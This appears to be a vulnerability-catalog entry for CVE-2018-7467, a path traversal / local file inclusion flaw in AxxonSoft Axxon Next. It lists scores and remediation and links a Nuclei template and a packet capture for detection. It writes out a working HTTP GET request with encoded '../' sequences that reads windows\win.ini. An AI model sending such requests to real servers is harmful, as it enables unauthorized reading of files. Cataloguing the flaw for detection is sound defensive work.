🔙 목록으로 돌아가기

CVE-2018-7467: AxxonSoft Axxon Next - Local File Inclusion

TitleAxxonSoft Axxon Next - Local File Inclusion
Author0x_Akoko
SeverityHigh
ImpactAn attacker can read sensitive files, execute arbitrary code, or launch further attacks.
RemediationApply the latest security patches or updates provided by AxxonSoft to fix the local file inclusion vulnerability.
CVSS Score7.5
EPSS Score0.30863
CVE IDCVE-2018-7467
CWE IDCWE-22
Tags cve cve2018 axxonsoft lfi packetstorm vuln

🔍 Vulnerability Description

AxxonSoft Axxon Next suffers from a local file inclusion vulnerability.

🌐 HTTP Request

GET //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini HTTP/1.1
Host: www.victim.com

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-7467.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-7467.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A